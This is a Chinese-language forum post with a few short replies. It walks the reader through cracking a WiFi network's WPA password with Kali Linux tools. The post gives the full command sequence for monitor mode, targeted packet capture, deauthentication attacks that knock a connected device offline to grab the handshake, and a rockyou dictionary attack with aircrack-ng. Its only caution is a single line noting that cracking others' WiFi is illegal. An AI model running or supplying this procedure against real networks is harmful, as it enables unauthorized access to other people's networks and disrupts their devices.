如何破解wifi密码。

2284163660   ·   发表于 2018-07-17 11:06:30   ·   闲聊灌水区

kali linux本身就有字典文件,我们把它解压出来。

root@kali:~# gzip -d /usr/share/wrodlists/rockyou.txt.gz

这里我们选用暴力破解。

1.输入airmon-ng查看是否支持监听模式

从图中可以看到我的无线网卡wlan0是支持监听模式的。如果该命令没有任何输出则表示没有可以支持监听模式的网卡。(airmon-ng也是需要安装的,装机的时候应该有。有些可能显示的是wifi0,但不管怎样实质都是一样的,只是输入的时候注意下。)

2.开启无线网卡的监听模式

如果前面显示的是wifi0,就把wlan0改为wifi0

root@kali:~# airmon-ng start wlan0

大家这时候再输入ifconfig,会发现wlan0变为了wlan0mon,这表明网卡监听模式已开启。

3.搜索一下附近的WiFi。

root@kali:~# airodump-ng wlan0mon

使用airodump-ng 命令列出无线网卡扫描到的WiFi热点详细信息,包括信号强度,加密类型,信道等。这里我们记下要破解WiFi的BSSID和信道,如图中我用红色标记出来的。当搜索到我们想要破解的WiFi热点时可以 Ctrl+C 停止搜索。

4.抓取握手包 
使用网卡的监听模式抓取周围的无线网络数据包,其中我们需要用到的数据包是包含了WiFi密码的握手包,当有新用户连接WiFi时会发送握手包。 

抓包。

root@kali:~# airodump-ng -c 10 --bssid D4:EE:07:12:57:80 -w ~/ wlan0mon

参数解释:

  • -c 指定信道,上面已经标记目标热点的信道
  • -bssid指定目标路由器的BSSID,就是上面标记的BSSID
  • -w指定抓取的数据包保存的目录
  • 上面可以看到连接到wifi热点的设备,我标记出来的是我的平板电脑的MAC地址。

    5.强制连接到wifi的设备重连路由器 
    现在我们使用aireplay-ng命令给平板发送一个反认证包,使平板电脑强制断开连接,随后它会自动再次连接wifi。 
    不难看出,airplay-ng生效的前提是WiFi热点中必须至少已经接入一个设备。 
    由于刚刚打开的终端一直在执行抓包工作,所以我们重新打开一个终端,输入命令。

    # aireplay-ng -0 2 -a D4:EE:07:12:57:80 -c AC:CF:85:B6:81 wlan0mon

    参数解释

  • -a指定WiFi热点的BSSID
  • -c指定要攻击设备的MAC地址 
  • 此刻可以看到已经成功抓取到握手包了。如下:

     

    这个时候使用Ctrl+C命令停止抓包,同时结束无线网卡的监听模式。 
    结束监听:

    root@kali:~# airmon-ng stop wlan0mon


    6 暴力破解 
    上面已经成功抓取到了握手包,现在要做的工作就是将握手包的密码和字典文件中的密码进行匹配,我只是使用了一般复杂的全字母密码,花了将近20分钟破解出密码。

    root@kali:~# aircrack-ng -a2 -b D4:EE:07:12:57:80 -w /usr/share/wordlist/rockyou.txt ~/*.cap

    可以看到,密码出来了。

    PS:私自破解他人wifi密码是违法的。

    打赏我,让我更有动力~

    4 条回复   |  直到 2019-1-20 | 2478 次浏览

    极限病毒
    发表于 2018-12-16

    感觉完全没用

    评论列表

    • 加载数据中...

    编写评论内容

    alangreen
    发表于 2018-7-17

    这个主要还是看字典以及机器是否强大吧

    评论列表

    • 加载数据中...

    编写评论内容

    gongzero
    发表于 2018-7-17

    没有这个了

    评论列表

    • 加载数据中...

    编写评论内容

    2284163660
    发表于 2019-1-20

    我说你们。。。有无线网卡不。。。就想破wifi密码。。。

    评论列表

    • 加载数据中...

    编写评论内容
    登录后才可发表内容
    返回顶部 投诉反馈

    © 2016 - 2024 掌控者 All Rights Reserved.